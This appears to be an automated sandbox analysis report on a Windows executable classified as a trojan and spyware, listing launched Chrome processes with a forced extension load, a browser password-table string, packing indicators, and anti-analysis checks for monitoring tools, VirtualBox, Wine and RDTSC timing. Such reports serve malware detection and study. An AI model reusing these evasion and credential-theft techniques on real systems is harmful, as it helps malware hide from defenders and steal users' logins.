              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/61@9/6
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2261382861.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238208346.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238617063.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261255436.0000000005B16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 47%
              Source: file.exeString found in binary or memory: ing,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\Windows\crx --single-argument http://go.m
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15066191310889965493,6734500670123493678,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,11137698376762486323,5584479856548226272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15066191310889965493,6734500670123493678,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,11137698376762486323,5584479856548226272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1901056 > 1048576
              Source: file.exeStatic PE information: Raw size of tklpndtl is bigger than: 0x100000 < 0x1a6800
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2496620325.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2602668272.00000000062B2000.00000040.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tklpndtl:EW;natdubhn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tklpndtl:EW;natdubhn:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1dc830 should be: 0x1db250
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: tklpndtl
              Source: file.exeStatic PE information: section name: natdubhn
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05AF2231 push ds; iretd 0_3_05AF2232
              Source: file.exeStatic PE information: section name: entropy: 7.979770872652821
              Source: file.exeStatic PE information: section name: tklpndtl entropy: 7.953039924207103

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA7E second address: B5BA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA82 second address: B5BA88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA88 second address: B5BA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD22C second address: CDD236 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F15FCC2EA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD236 second address: CDD23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD23C second address: CDD259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA79h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7D16 second address: CC7D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F15FCD6BB56h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7D22 second address: CC7D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC297 second address: CDC2A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F15FCD6BB56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC589 second address: CDC593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC73C second address: CDC75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F15FCD6BB69h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC75D second address: CDC761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC895 second address: CDC8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F15FCD6BB5Eh 0x0000000b jne 00007F15FCD6BB56h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCBAE second address: CDCBBA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F15FCC2EA66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCBBA second address: CDCBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F15FCD6BB56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE585 second address: CDE589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE589 second address: CDE58D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE58D second address: CDE596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE6D1 second address: CDE6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE6D5 second address: CDE6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE6E5 second address: CDE6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE850 second address: CDE878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b ja 00007F15FCC2EA6Ch 0x00000011 pop esi 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jmp 00007F15FCC2EA6Ah 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEA08 second address: CDEA0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEA0E second address: CDEA2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F15FCC2EA6Eh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEA2E second address: CDEAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F15FCD6BB5Ch 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D1C6Eh] 0x00000015 call 00007F15FCD6BB59h 0x0000001a pushad 0x0000001b jg 00007F15FCD6BB58h 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F15FCD6BB5Eh 0x0000002e mov eax, dword ptr [esp+04h] 0x00000032 jmp 00007F15FCD6BB66h 0x00000037 mov eax, dword ptr [eax] 0x00000039 jmp 00007F15FCD6BB67h 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 jno 00007F15FCD6BB56h 0x0000004d popad 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEAB5 second address: CDEB36 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F15FCC2EA66h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d or dword ptr [ebp+122D186Eh], eax 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push 00000003h 0x00000019 mov esi, dword ptr [ebp+122D2B2Ah] 0x0000001f push A6C59144h 0x00000024 jmp 00007F15FCC2EA75h 0x00000029 add dword ptr [esp], 193A6EBCh 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F15FCC2EA68h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a lea ebx, dword ptr [ebp+124564B0h] 0x00000050 mov edi, 2E86DCFBh 0x00000055 jmp 00007F15FCC2EA6Ah 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d je 00007F15FCC2EA6Ch 0x00000063 jbe 00007F15FCC2EA66h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEB36 second address: CDEB40 instructions: 0x00000000 rdtsc 0x00000002 js 00007F15FCD6BB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC47BA second address: CC47BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC47BE second address: CC47C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC47C2 second address: CC47C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE93B second address: CFE950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Bh 0x00000007 jl 00007F15FCD6BB5Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
